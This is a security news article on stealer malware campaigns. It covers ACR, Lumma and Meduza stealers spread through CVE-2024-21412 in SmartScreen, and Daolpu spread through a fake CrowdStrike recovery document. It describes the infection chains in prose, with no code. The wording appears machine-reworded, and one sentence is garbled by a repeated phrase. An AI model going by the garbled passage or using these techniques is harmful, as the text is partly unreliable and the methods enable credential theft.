Exploit in Microsoft Defender Weakness Used to Distribute ACR, Lumma, and Meduza Stealers
A recently fixed security loophole in the Microsoft Defender SmartScreen has been taken advantage of in a new operation to distribute information thieves like ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs pointed out the campaign targeting Spain, Thailand, and the U.S. that used corrupted files to exploit CVE-2024-21412 (CVSS score: 8.1).
This critical vulnerability enables a hacker to bypass SmartScreen protection and inject harmful content. Microsoft tackled this issue in its security patches rolled out in February 2024.
“To start with, attackers entice victims to click on a manipulated link leading to a URL file intended to download an LNK file,” security researcher Cara Lin mentioned. “This LNK file then fetches an executable file that holds an [HTML Application] script.”
The HTA document acts as a conduit to interpret and decode PowerShell code responsible for retrieving a dummy PDF file and a shellcode injector that, in effect, either paves the way for the introduction of Meduza Stealer or Hijack Loader, which in turn triggers ACR Stealer or Lumma.
ACR Stealer, evaluated as an advanced version of the GrMsk Stealer, was promoted in late March 2024 by a threat actor named SheldIO on the Russian-language underground forum RAMP.
“This ACR stealer conceals its [command-and-control] using a dead drop resolver (DDR) technique on the Steam community website,” Lin explained, highlighting its capacity to extract data from web browsers, cryptocurrency wallets, messaging applications, FTP clients, email platforms, VPN services, and password management tools.
It is relevant to mention that recent Lumma Stealer assaults have also been sighted utilizing the same method, making it simpler for the attackers to change the C2 domains at any time and strengthen the infrastructure, as stated by the AhnLab Security Intelligence Center (ASEC).
This development coincides with CrowdStrike’s disclosure that threat actors are leveraging unveiled that threat actors are utilizing last week’s outage to spread an undisclosed information stealer known as Daolpu, marking the most recent instance of the continuing repercussions coming from the defective update that has impacted millions of Windows devices.
The assault entails the use of a macro-implemented Microsoft Word document that pretends to be a Microsoft recovery handbook listing authentic guidelines furnished by the Windows developer to resolve the issue, leveraging it as a guise to trigger the infection procedure.
The DOCM file, upon opening, runs the macro to fetch a secondary DLL file from a distant location that’s deciphered to initiate Daolpu, a stealing malware designed to gather credentials and cookies from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based web browsers.
This development is amidst the emergence of new families of stealing malware such as Braodo and DeerStealer, while cybercriminals are exploiting malvertising methods to promote legitimate software like Microsoft Teams to deploy Atomic Stealer.
“As cybercriminals intensify their distribution campaigns, downloading applications from search engines becomes more perilous,” Malwarebytes researcher Jérôme Segura stated. “Users have to steer through malvertising (sponsored results) and SEO poisoning (compromised websites).”
About Author
